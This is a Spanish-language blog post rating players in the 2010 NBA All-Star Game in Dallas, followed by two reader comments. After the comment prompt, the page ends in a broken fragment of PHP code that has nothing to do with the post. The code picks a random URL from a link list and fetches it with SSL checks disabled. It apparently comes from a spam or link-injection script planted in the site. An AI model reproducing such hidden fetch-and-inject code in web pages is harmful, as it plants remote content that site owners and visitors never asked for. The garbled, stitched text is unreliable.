DALLAS 2010: ALL STAR GAME

15 de February de 2010 por TheDeerHunter

Terminó el fin de semana de las estrellas. Tras todo lo que hemos despotricado debemos reconocer que, gracias al evento estrella, terminaremos la fiesta con mejor sabor de boca que en las jornadas anteriores.

Y es que tras haber sido testigos de la magnificencia de la puesta en escena del espectáculo de anoche es fácil dejarse deslumbrar un poco por las luces y por el ambiente. Diríamos que no habíamos visto nunca un escenario comparable como el estadio de los Cowboys para el disfrute del baloncesto. Más de 108.000 espectadores fueron testigos de primera mano. Incomparable. Quizás sólo por esto ya ha merecido la pena la experiencia.Después Shakira, Alicia Keys, las preciosas animadoras, los números circenses, los bailes, las celebrities, los hall of famers, el equipo nacional, las mascotas hinchables… Hay que reconocer que estos americanos saben montar bien sus “guateques”. Y es que lo hablábamos anoche en directo. Quizás el problema de todo esto sea el sentido lúdico que ellos y nosotros tenemos del espectáculo. Para ellos esta fiesta es un paréntesis con el único propósito de relajarse, sin mayores ambiciones. A nosotros, nos cuesta digerir aquello de bajar el nivel de exigencia aunque sea en una pachanga. En cualquier caso el partido en sí tuvo cosas buenas y cosas malas, pero al menos nos mantuvo entretenidos hasta el final. Eso siempre se agradece.

Les pondría un sobresaliente a Wade y a Bosh. Ambos encontraron el punto justo de intensidad y espectáculo. Flash se mereció más el MVP porque, sin forzar nada, estuvo a punto de alcanzar el triple doble en media hora de juego y estuvo involucrado en la mayoría de las acciones más espectaculares del encuentro. A Bosh le vimos serio y participativo, en un estado de forma destacable.

El notable se lo daríamos a LeBron y a Dwight Howard. Ambos mostraron su terrible pegada pero se pasaron un poco de risitas y payasadas. Por el Oeste Durant y Williams fueron los que más seriamente se tomaron la faena y los que más eficazmente aportaron a su equipo.

Por un momento llegamos a temer que el Oeste ganara el partido y el MVP fuera a parar a manos de Carmelo Anthony. Su producción ofensiva fue monstruosa, pero fría como el témpano. Carente de espectáculo y emoción. Su defensa lamentable y su modo de resolver el partido en el filo muy deficiente. Por el este estuvieron bien Nowitzki, Gasol y Stoudamire. Sin excesos. En el este vimos muy centrados a Rose y Horford. Aprobados “pelaos” para gente que cumplió con el expediente: Joe Johnson, Paul Pierce, Rondo, Randolph, Nash, Billups algo más chupón de la cuenta…

A Kidd, Duncan o David Lee bien podrían haberles dejado tomar vacaciones, para lo poco que participaron. Mención a parte para Kaman, que estuvo horrendo, y a Garnett que lo volvimos a ver cojo. Da la sensación que puede ser su última participación. Ójala todo sean imaginaciones nuestras.

Y esto es todo. El año que viene más y mejor.

Comenta

2 comentarios a esta entrada

  1. Uno cualquiera dice:
    #1

    Pues yo les daría la mejor nota a Wade, Bosh y Deron (éste me encantó) y muy buena nota a Nowitzki y Billups y el suspenso a LeBron (por pasarse 3 pueblos de chupón y de sus jueguecitos que no hacen gracia), Carmelo (por más chupón aún y encima pedir todo el rato entrar en la cancha con el único propósito de llevarse el MVP), Kaman y Lee.

    Por cierto, al “pobre” Howard le pitaban todas las faltas que a los demás no señalaban xD

    PD: muchas felicidades de nuevo con el blog. Desde que pedistéis ayuda para ampliarlo han salido nuevos colaboradores a la palestra que estan ensanchando las miras del mismo con artículos interesantísimos con los que se aprende mucho. Felicidades a todos, cracks.

      Citar

  2. Txusma dice:
    #2

    Partdo entretenido sin más, tal vez con menos acciones espectaculares q en otras ocasiones provocado muchas veces por una mayor intensidad defensiva. Incluso en algo momento Zach Randolp se pasó de intenso y evito de una manera un tanto brusca el mate de Wade.
    El de Miami fue sin duda el mejor junto a Bosh que aunq estuvo un pelin fallon al final se bailo a todo pivot que se le puso delante. Melo y Billups, a pesar de las estadisticas, no me gustaron mucho. Muy chupones ambos, aunq el base fue más decisivo en la parte final. En el Oeste, como dicen todos, el mejor fue Deron que nos regalo 3-4 minutos de autentico lujo.
    Fuimos testigo del definitivo cambio generacional viendo como los Garnett, Duncan o Kidd disputaban poquisimos minutos en beneficios de los Wade, Lebron, Carmelo, etc… A Duncan a lo mejor le quedan otro All-Stars (o 2, con un super clase como él nunca se sabe) pero a los otros 2 ya los podemos despedir.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>